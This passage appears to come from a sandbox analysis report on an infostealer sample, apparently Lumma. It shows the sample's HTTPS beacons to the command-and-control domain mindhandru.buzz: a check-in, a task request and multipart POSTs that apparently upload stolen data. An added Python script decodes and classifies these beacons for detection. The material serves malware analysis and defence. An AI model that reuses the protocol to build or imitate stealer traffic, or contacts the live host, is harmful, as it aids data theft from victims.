Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f1esZkZz4t66nNJQwVqx0y%2F8dJty5RA2NDTYVHUbH%2By6xFDwdOypxkg50W%2BzNxTSgxhnQbL5A1aMCUkC8L2YblIycgsE9RV36zHTIHHRqah6SDVtwbFNquo9%2FB1fQRSGEQY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80d2c5dea98c39-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1856&min_rtt=1855&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1563169&cwnd=190&unsent_bytes=0&cid=b313285c9ebbd47d&ts=2817&x=0"
2024-12-26 11:45:15 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-26 11:45:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
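The two proxied sessions to mindhandru.buzz show the full shape of this sample's C2 handshake: session 0 sends a bare `act=life` check-in and gets the chunked reply `2\r\nok\r\n0\r\n\r\n` (which the report's ASCII view prints as `2ok` and `0` because control characters are dropped), and session 1 follows with `act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=`. The script below is an added example and is not part of the Joe Sandbox report or of the sample: it rebuilds the bytes from the report's "Data Raw" hex dumps, parses the form body, reassembles the chunked response, and applies a small classification heuristic. That heuristic (keying on the `act` value, the misspelled `recive_message` action and the presence of `lid`) is an assumption modelled on this one capture, not a vendor signature; the Chrome User-Agent is deliberately not used as an indicator because it is indistinguishable from a real browser.

```python
"""Decode and classify the /api beacons captured in this report.

Added example, not code from the Joe Sandbox report or from the sample.
The hex strings are copied from the report's "Data Raw" rows (sessions 0 and 1);
the classification rules are an assumption modelled on this capture only.
"""
import binascii
from typing import Dict, Optional
from urllib.parse import parse_qs

# Constructed from the report's "Data Raw" dumps.
SESSION0_REQUEST_BODY_HEX = "61 63 74 3d 6c 69 66 65"               # act=life
SESSION0_RESPONSE_BODY_HEX = "32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a"   # chunked "ok"
SESSION1_REQUEST_BODY_HEX = (
    "61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d "
    "34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d"
)


def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn a space-separated hex dump ("61 63 74 ...") back into raw bytes."""
    return binascii.unhexlify(dump.replace(" ", ""))


def decode_chunked(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked transfer-encoded body.

    Each chunk is "<hex size>[;ext]\\r\\n<data>\\r\\n"; a zero-size chunk ends
    the body. The report shows the chunks "2\\r\\nok\\r\\n" and "0\\r\\n\\r\\n".
    """
    out = bytearray()
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end].split(b";")[0], 16)
        pos = line_end + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that terminates the chunk data


def parse_beacon(body: bytes) -> Dict[str, str]:
    """Parse the x-www-form-urlencoded body into a flat dict.

    keep_blank_values matters here: the second beacon carries an empty "j="
    field, which parse_qs would otherwise silently drop.
    """
    fields = parse_qs(body.decode("ascii"), keep_blank_values=True)
    return {key: values[0] for key, values in fields.items()}


def classify_beacon(fields: Dict[str, str]) -> Optional[str]:
    """Label a beacon from its form fields (heuristic; assumption from this capture).

    The request's generic Chrome User-Agent is ignored on purpose. The signal is
    the body: a lone "act=life" check-in, and the misspelled "recive_message"
    action sent together with a "lid" value.
    """
    act = fields.get("act")
    if act == "life" and len(fields) == 1:
        return "lumma-keepalive"
    if act == "recive_message" and "lid" in fields:
        return "lumma-task-request"
    return None


def analyse_capture() -> Dict[str, object]:
    """Run the helpers over the bytes recorded in the report."""
    first = parse_beacon(hex_dump_to_bytes(SESSION0_REQUEST_BODY_HEX))
    second = parse_beacon(hex_dump_to_bytes(SESSION1_REQUEST_BODY_HEX))
    return {
        "session0": classify_beacon(first),
        "session0_reply": decode_chunked(hex_dump_to_bytes(SESSION0_RESPONSE_BODY_HEX)),
        "session1": classify_beacon(second),
        "session1_fields": second,
    }


if __name__ == "__main__":
    for name, value in analyse_capture().items():
        print(f"{name}: {value!r}")
```

In a detection pipeline the same `parse_beacon` / `classify_beacon` pair can be fed the decoded body of any POST to `/api` seen by a TLS-inspecting proxy; without TLS inspection only the DNS lookup of mindhandru.buzz and the 443/TCP flows to 172.67.165.185 listed above are visible on the wire, and the Cloudflare-fronted address is shared with unrelated sites, so the domain, not the IP, is the indicator worth blocking.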


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49720 | 172.67.165.185 | 443 | 5448 | C:\Users\user\Desktop\XM6cn2uNux.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-26 11:45:16 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: mindhandru.buzz
2024-12-26 11:45:16 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-26 11:45:17 UTC | 1121 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:45:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=icnk7sd2nmmtog61pvsv4n640p; expires=Mon, 21 Apr 2025 05:31:55 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ag8fiooVc9vRXhn90ZU%2FZAVFKuxPkCsysIwpBfdY55vgxo0O5knUh2XESE1Zlf7Qzg0V3z4AR%2FAunEJFGowkwPa4p1dEd9dnDVXFtV7s1eVtiRxxwizBRZkODKTvIN1JYik%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80d2dfaf9a4314-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1588&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=946&delivery_rate=1763285&cwnd=188&unsent_bytes=0&cid=fee83dedabadb296&ts=805&x=0"
                                                                                                            2024-12-26 11:45:17 UTC248INData Raw: 63 34 61 0d 0a 4d 6f 77 55 45 46 67 61 76 68 44 4b 39 44 48 77 37 5a 46 71 45 70 4e 70 52 2b 69 37 4d 33 6d 66 62 36 75 66 6b 77 79 36 75 57 78 4a 72 6d 49 79 59 69 36 53 4d 72 6d 52 45 38 71 5a 34 78 39 33 76 30 73 6d 6a 4a 6b 4a 48 2f 34 44 32 50 71 2f 4c 73 7a 55 54 67 6a 71 64 58 77 72 66 35 49 79 72 34 77 54 79 72 62 71 53 48 66 39 53 33 33 4b 33 6c 6b 62 2f 67 50 4a 2f 76 68 6a 79 74 55 50 57 75 42 7a 65 44 31 35 32 6e 47 6d 6d 56 53 56 69 50 41 41 66 50 6f 45 4c 34 57 5a 48 31 76 36 46 59 6d 6c 73 55 48 66 7a 51 31 2f 37 57 64 37 65 6d 65 53 61 2b 69 52 58 39 4c 58 73 77 74 33 38 51 55 68 6a 4e 42 62 45 66 63 4c 79 50 76 35 66 4e 50 66 42 46 72 75 63 48 6b 33 63 4d 35 38 72 4a 35 66 6b 34 4c 77 53 44 36 78 44 44 33 4b 67 52 46
                                                                                                            Data Ascii: c4aMowUEFgavhDK9DHw7ZFqEpNpR+i7M3mfb6ufkwy6uWxJrmIyYi6SMrmRE8qZ4x93v0smjJkJH/4D2Pq/LszUTgjqdXwrf5Iyr4wTyrbqSHf9S33K3lkb/gPJ/vhjytUPWuBzeD152nGmmVSViPAAfPoEL4WZH1v6FYmlsUHfzQ1/7Wd7emeSa+iRX9LXswt38QUhjNBbEfcLyPv5fNPfBFrucHk3cM58rJ5fk4LwSD6xDD3KgRF
                                                                                                            2024-12-26 11:45:17 UTC1369INData Raw: 49 7a 77 37 59 37 4f 52 6a 79 4e 31 4f 54 36 42 76 4d 6a 31 30 6e 43 72 6f 6e 6c 2b 63 69 76 41 48 64 2f 41 4c 4e 34 58 5a 55 68 50 31 43 63 50 79 2f 6d 48 57 30 51 6c 59 35 33 46 39 50 58 44 61 66 61 76 57 48 64 4b 49 36 30 67 6f 73 53 73 31 69 64 70 46 46 75 78 4e 31 72 50 6f 4c 74 2f 58 54 67 69 75 63 48 77 37 64 64 78 67 6f 4a 31 59 6c 35 33 34 41 58 33 38 43 79 69 41 31 6c 49 62 2b 67 66 44 38 76 74 71 31 64 59 49 55 4f 34 32 50 48 70 2f 78 44 4c 77 31 6e 43 58 6e 2f 51 45 5a 72 4d 78 5a 5a 57 58 53 46 76 36 41 59 6d 6c 73 57 62 64 32 41 31 62 34 58 56 36 4d 57 72 63 59 4b 36 62 56 6f 43 4a 39 67 5a 36 38 68 6b 76 68 4e 39 53 45 76 59 45 7a 50 72 31 4c 70 61 62 43 55 69 75 4c 6a 49 62 64 64 64 2b 6f 6f 46 54 30 70 43 39 45 54 44 32 42 32 58 53 6d 56
                                                                                                            Data Ascii: Izw7Y7ORjyN1OT6BvMj10nCronl+civAHd/ALN4XZUhP1CcPy/mHW0QlY53F9PXDafavWHdKI60gosSs1idpFFuxN1rPoLt/XTgiucHw7ddxgoJ1Yl534AX38CyiA1lIb+gfD8vtq1dYIUO42PHp/xDLw1nCXn/QEZrMxZZWXSFv6AYmlsWbd2A1b4XV6MWrcYK6bVoCJ9gZ68hkvhN9SEvYEzPr1LpabCUiuLjIbddd+ooFT0pC9ETD2B2XSmV
                                                                                                            2024-12-26 11:45:17 UTC1369INData Raw: 68 37 33 32 64 70 69 44 54 6e 72 74 59 6e 45 77 4f 75 6c 78 70 70 68 55 68 4d 2f 73 52 6d 6d 78 44 43 6e 4b 67 52 45 57 2f 41 58 50 37 2f 35 6a 32 39 55 41 58 2b 74 35 65 6a 70 34 30 58 65 73 6e 56 69 52 67 76 63 61 65 76 45 44 49 49 76 54 57 31 75 7a 54 63 37 6c 73 54 61 59 36 68 6c 62 72 45 4e 78 4e 48 62 62 5a 4f 69 4a 48 59 76 50 39 41 51 77 71 55 73 6f 67 74 78 55 46 50 77 48 78 2f 6a 37 59 74 44 56 44 55 4c 68 63 6e 49 32 63 4e 5a 2f 70 70 4a 62 6d 34 54 34 44 6e 44 77 41 57 58 45 6d 56 59 44 76 56 57 4a 79 66 5a 69 31 64 52 4d 5a 65 31 34 66 44 31 75 6e 47 33 6d 6a 78 4f 56 67 37 4e 51 4d 50 30 43 4a 59 48 54 56 52 76 36 41 4d 7a 2b 39 6d 33 56 33 41 52 65 36 58 4a 2b 4d 33 58 61 63 71 2b 53 56 6f 43 4b 2b 67 52 38 73 55 56 6c 6a 63 45 52 51 37 30
                                                                                                            Data Ascii: h732dpiDTnrtYnEwOulxpphUhM/sRmmxDCnKgREW/AXP7/5j29UAX+t5ejp40XesnViRgvcaevEDIIvTW1uzTc7lsTaY6hlbrENxNHbbZOiJHYvP9AQwqUsogtxUFPwHx/j7YtDVDULhcnI2cNZ/ppJbm4T4DnDwAWXEmVYDvVWJyfZi1dRMZe14fD1unG3mjxOVg7NQMP0CJYHTVRv6AMz+9m3V3ARe6XJ+M3Xacq+SVoCK+gR8sUVljcERQ70
                                                                                                            2024-12-26 11:45:17 UTC167INData Raw: 54 61 59 30 67 64 43 34 48 68 37 4e 33 37 55 64 61 61 62 57 4a 53 45 39 41 39 32 2f 41 4d 6f 6a 39 70 51 48 2f 63 66 79 76 62 37 59 39 4b 62 51 42 44 70 62 6a 4a 69 4f 50 74 2b 67 59 5a 49 67 4a 6d 7a 46 7a 37 6f 53 79 4b 47 6d 51 6c 62 2f 67 4c 41 38 76 6c 6d 31 39 51 4b 58 75 68 77 66 7a 39 33 31 6d 43 67 6d 46 36 5a 67 50 67 61 63 50 77 50 4b 59 37 52 57 68 47 39 51 34 6e 36 36 53 36 41 6d 7a 74 64 34 58 5a 78 4c 44 6a 44 50 4c 48 57 56 4a 37 50 71 30 68 38 2f 77 73 71 68 74 56 61 45 2f 0d 0a
                                                                                                            Data Ascii: TaY0gdC4Hh7N37UdaabWJSE9A92/AMoj9pQH/cfyvb7Y9KbQBDpbjJiOPt+gYZIgJmzFz7oSyKGmQlb/gLA8vlm19QKXuhwfz931mCgmF6ZgPgacPwPKY7RWhG9Q4n66S6Amztd4XZxLDjDPLHWVJ7Pq0h8/wsqhtVaE/
                                                                                                            2024-12-26 11:45:17 UTC1369INData Raw: 38 33 39 0d 0a 77 42 78 2f 72 30 5a 39 44 54 48 46 48 71 66 6e 4d 30 64 39 31 32 72 5a 4e 58 6c 59 76 31 42 7a 43 2f 53 79 4b 53 6d 51 6c 62 30 69 72 38 76 39 42 55 6d 4d 52 41 53 61 35 78 66 6e 6f 67 6e 48 36 72 6d 6c 75 64 69 66 6f 45 65 76 67 41 4b 59 48 64 58 52 4c 34 43 38 6a 34 39 47 2f 63 31 77 52 57 37 58 56 39 4e 58 66 55 4d 75 62 57 56 49 72 50 71 30 68 56 35 67 41 72 6a 4a 6c 4f 56 65 52 4e 7a 76 47 78 4e 70 6a 58 42 31 62 6f 63 33 34 37 66 74 52 33 6f 4a 4a 53 6c 49 6e 77 42 33 54 30 43 69 71 4f 31 56 38 52 2f 41 7a 46 39 76 35 6c 33 5a 74 41 45 4f 6c 75 4d 6d 49 34 37 58 47 2b 67 55 4f 65 7a 2b 78 47 61 62 45 4d 4b 63 71 42 45 52 72 76 42 38 50 7a 39 47 48 64 32 41 46 58 34 33 42 2b 4d 48 48 55 64 4b 65 66 51 5a 47 44 2f 51 39 2b 2f 51 55 6f
                                                                                                            Data Ascii: 839wBx/r0Z9DTHFHqfnM0d912rZNXlYv1BzC/SyKSmQlb0ir8v9BUmMRASa5xfnognH6rmludifoEevgAKYHdXRL4C8j49G/c1wRW7XV9NXfUMubWVIrPq0hV5gArjJlOVeRNzvGxNpjXB1boc347ftR3oJJSlInwB3T0CiqO1V8R/AzF9v5l3ZtAEOluMmI47XG+gUOez+xGabEMKcqBERrvB8Pz9GHd2AFX43B+MHHUdKefQZGD/Q9+/QUo
                                                                                                            2024-12-26 11:45:17 UTC743INData Raw: 7a 30 42 74 76 33 39 6d 6e 54 30 77 56 66 36 47 52 2b 4e 47 72 5a 59 4c 72 57 48 64 4b 49 36 30 67 6f 73 54 30 69 6d 73 6c 53 57 63 77 62 79 75 76 36 59 39 53 62 45 52 37 33 4e 6e 55 32 4f 49 51 79 72 70 6c 61 6b 59 44 79 41 58 7a 38 44 69 79 50 32 46 63 66 39 77 66 4a 2b 2f 64 76 33 64 45 4e 55 65 52 2f 64 54 4a 2f 33 32 44 6f 32 42 4f 56 6c 37 4e 51 4d 4e 67 4d 4e 34 54 4a 45 51 53 7a 46 49 6e 36 2f 53 36 41 6d 77 70 61 34 58 4a 31 4e 6e 37 5a 64 4b 57 58 58 4a 4f 50 2f 41 78 37 2b 41 30 6b 68 39 78 63 48 2b 38 48 77 76 4c 39 5a 39 54 57 54 68 36 75 63 57 70 36 49 4a 78 44 70 5a 68 64 6c 5a 6d 7a 46 7a 37 6f 53 79 4b 47 6d 51 6c 62 2f 41 48 47 2f 76 35 74 32 39 6f 45 51 76 78 36 65 7a 4a 39 30 48 6d 6d 6b 45 47 55 67 50 6f 4c 63 2f 67 4d 4c 59 62 54 55
                                                                                                            Data Ascii: z0Btv39mnT0wVf6GR+NGrZYLrWHdKI60gosT0imslSWcwbyuv6Y9SbER73NnU2OIQyrplakYDyAXz8DiyP2Fcf9wfJ+/dv3dENUeR/dTJ/32Do2BOVl7NQMNgMN4TJEQSzFIn6/S6Amwpa4XJ1Nn7ZdKWXXJOP/Ax7+A0kh9xcH+8HwvL9Z9TWTh6ucWp6IJxDpZhdlZmzFz7oSyKGmQlb/AHG/v5t29oEQvx6ezJ90HmmkEGUgPoLc/gMLYbTU
                                                                                                            2024-12-26 11:45:17 UTC1369INData Raw: 38 33 32 0d 0a 77 65 44 35 37 31 58 47 76 6e 31 57 5a 6a 50 6b 48 64 2f 63 50 4a 59 48 65 58 78 33 34 42 73 43 39 76 79 37 66 77 30 34 49 72 6c 42 52 4b 47 72 75 66 4b 75 4e 45 34 33 42 36 6b 68 33 2f 55 74 39 79 74 4a 5a 46 4f 38 49 77 50 58 31 5a 39 6a 66 42 46 33 70 64 6e 63 33 66 64 68 38 72 4a 46 54 6e 6f 44 30 41 48 2f 31 43 79 72 4b 6c 78 45 63 35 55 32 52 76 64 46 6c 7a 76 6f 41 57 2f 77 32 62 58 52 68 6e 48 57 6b 31 67 76 53 67 66 6f 4a 65 50 38 48 4c 59 37 4c 55 52 44 30 41 73 6a 79 38 57 33 5a 30 51 5a 43 36 48 5a 35 4d 6e 2f 55 64 71 61 45 55 70 33 50 76 55 68 33 36 55 74 39 79 75 68 48 48 50 6f 43 69 39 54 32 64 64 6e 52 44 56 76 69 4e 6d 31 30 59 5a 78 31 70 4e 59 4c 30 6f 4c 2f 42 58 54 6a 42 79 57 4b 30 46 59 52 37 77 4c 47 38 50 4a 75 33
                                                                                                            Data Ascii: 832weD571XGvn1WZjPkHd/cPJYHeXx34BsC9vy7fw04IrlBRKGrufKuNE43B6kh3/Ut9ytJZFO8IwPX1Z9jfBF3pdnc3fdh8rJFTnoD0AH/1CyrKlxEc5U2RvdFlzvoAW/w2bXRhnHWk1gvSgfoJeP8HLY7LURD0Asjy8W3Z0QZC6HZ5Mn/UdqaEUp3PvUh36Ut9yuhHHPoCi9T2ddnRDVviNm10YZx1pNYL0oL/BXTjByWK0FYR7wLG8PJu3
                                                                                                            2024-12-26 11:45:17 UTC736INData Raw: 76 66 48 34 37 66 39 74 35 75 70 31 42 6d 59 66 77 42 6e 6a 34 43 79 75 4b 32 46 77 62 76 55 4f 4a 2b 75 6b 75 67 4a 73 72 63 2f 6c 67 65 48 68 62 79 32 53 69 6b 56 2b 45 68 50 49 4c 5a 76 77 62 5a 63 53 5a 51 42 7a 73 54 5a 48 72 34 58 6e 66 78 45 42 4a 72 6e 46 2b 65 69 43 63 65 61 65 59 58 70 6d 4c 2b 67 31 34 38 67 34 67 67 4e 56 64 47 76 55 45 77 2f 6a 30 61 4e 4c 59 41 46 2f 76 65 6e 59 7a 64 74 55 79 35 74 5a 55 69 73 2b 72 53 45 62 68 44 44 32 48 79 52 4d 70 2f 68 7a 59 36 50 78 2b 33 70 6b 68 55 2b 4a 31 64 7a 31 6f 6e 47 33 6d 6a 78 4f 56 67 37 4e 51 4d 50 45 50 4b 59 6e 65 58 78 54 77 41 73 37 32 2f 6d 54 57 79 51 46 56 35 6e 70 36 4e 32 72 57 65 4c 71 66 57 70 2b 42 2b 78 70 7a 73 55 56 6c 6a 63 45 52 51 37 30 2f 77 2f 37 39 65 4e 58 55 54 6b
                                                                                                            Data Ascii: vfH47f9t5up1BmYfwBnj4CyuK2FwbvUOJ+ukugJsrc/lgeHhby2SikV+EhPILZvwbZcSZQBzsTZHr4XnfxEBJrnF+eiCceaeYXpmL+g148g4ggNVdGvUEw/j0aNLYAF/venYzdtUy5tZUis+rSEbhDD2HyRMp/hzY6Px+3pkhU+J1dz1onG3mjxOVg7NQMPEPKYneXxTwAs72/mTWyQFV5np6N2rWeLqfWp+B+xpzsUVljcERQ70/w/79eNXUTk
                                                                                                            2024-12-26 11:45:17 UTC1369INData Raw: 38 30 63 0d 0a 76 76 59 45 35 61 65 73 31 41 67 6f 31 42 77 32 59 34 42 53 65 4a 44 30 4c 33 6e 4c 6f 43 4a 51 42 44 38 4e 69 70 36 50 39 39 67 75 70 42 51 68 49 79 30 4e 6b 37 57 45 53 69 4d 7a 6b 41 6c 77 77 72 54 38 50 64 35 79 5a 63 62 55 2b 42 34 64 53 77 34 6b 6a 4b 6e 31 67 75 72 7a 37 74 49 54 37 39 4c 50 63 71 42 45 53 37 2b 41 38 66 36 35 33 2b 56 2f 42 52 64 36 47 46 6a 65 6a 61 63 64 4f 6a 4f 41 39 7a 50 39 78 6b 77 71 56 74 33 30 59 77 43 54 4b 31 66 31 72 50 6f 4c 73 36 62 56 67 4b 67 4e 6d 42 36 49 4a 77 31 71 34 52 42 6c 49 7a 6c 43 7a 66 50 4e 51 75 4e 33 31 51 63 37 55 2f 6e 39 75 56 70 6d 4a 56 4f 58 36 34 75 53 33 6f 77 6e 45 33 6d 31 6b 76 53 31 37 4d 39 63 2f 38 46 49 70 7a 49 48 44 58 36 43 38 7a 36 34 53 7a 32 30 42 70 58 72 6a 67
                                                                                                            Data Ascii: 80cvvYE5aes1Ago1Bw2Y4BSeJD0L3nLoCJQBD8Nip6P99gupBQhIy0Nk7WESiMzkAlwwrT8Pd5yZcbU+B4dSw4kjKn1gurz7tIT79LPcqBES7+A8f653+V/BRd6GFjejacdOjOA9zP9xkwqVt30YwCTK1f1rPoLs6bVgKgNmB6IJw1q4RBlIzlCzfPNQuN31Qc7U/n9uVpmJVOX64uS3ownE3m1kvS17M9c/8FIpzIHDX6C8z64Sz20BpXrjg


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.6  49736        172.67.165.185  443               5448  C:\Users\user\Desktop\XM6cn2uNux.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-26 11:45:19 UTC  272 bytes  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=3C0DBROOY
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12805
Host: mindhandru.buzz
2024-12-26 11:45:19 UTC  12805 bytes  OUT  Data Raw: 2d 2d 33 43 30 44 42 52 4f 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 37 36 36 46 37 45 34 44 44 37 43 34 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 33 43 30 44 42 52 4f 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 43 30 44 42 52 4f 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 33 43 30 44 42 52 4f 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
Data Ascii: --3C0DBROOYContent-Disposition: form-data; name="hwid"73766F7E4DD7C48FBEBA0C6A975F1733--3C0DBROOYContent-Disposition: form-data; name="pid"2--3C0DBROOYContent-Disposition: form-data; name="lid"PsFKDg--pablo--3C0DBROOYContent-Disp
2024-12-26 11:45:27 UTC  1128 bytes  IN  HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 11:45:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=mormn0u7v21k5lgo58e8sn8ak8; expires=Mon, 21 Apr 2025 05:32:05 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z30Ni%2F1G0MrWfNOkNqOoYP6O5T0kXVJbvbRULV1WUFB3OhuKnipHlpNT4LzSrYE4eNuAdDpqFzq1Ku82igOwimbGAY%2FNxslhVufiaurk4ONk72jJgzu%2BwFZYUlQdCs9waPo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80d2f04c6878d6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1811&rtt_var=696&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13735&delivery_rate=1553191&cwnd=147&unsent_bytes=0&cid=77f197f2b12f9dfd&ts=8028&x=0"
2024-12-26 11:45:27 UTC  20 bytes  IN  Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-26 11:45:27 UTC  5 bytes  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.6  49760        172.67.165.185  443               5448  C:\Users\user\Desktop\XM6cn2uNux.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-26 11:45:28 UTC  275 bytes  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=GGOM7NCR28HL
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 15069
Host: mindhandru.buzz
2024-12-26 11:45:28 UTC  15069 bytes  OUT  Data Raw: 2d 2d 47 47 4f 4d 37 4e 43 52 32 38 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 37 36 36 46 37 45 34 44 44 37 43 34 38 46 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 47 47 4f 4d 37 4e 43 52 32 38 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 47 4f 4d 37 4e 43 52 32 38 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 47 47 4f 4d 37 4e 43 52 32 38 48 4c 0d 0a
Data Ascii: --GGOM7NCR28HLContent-Disposition: form-data; name="hwid"73766F7E4DD7C48FBEBA0C6A975F1733--GGOM7NCR28HLContent-Disposition: form-data; name="pid"2--GGOM7NCR28HLContent-Disposition: form-data; name="lid"PsFKDg--pablo--GGOM7NCR28HL


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.6  49860        172.67.165.185  443               5448  C:\Users\user\Desktop\XM6cn2uNux.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-26 11:46:12 UTC  281 bytes  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=21HZVP8BZL9GZS5N5L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 19963
Host: mindhandru.buzz
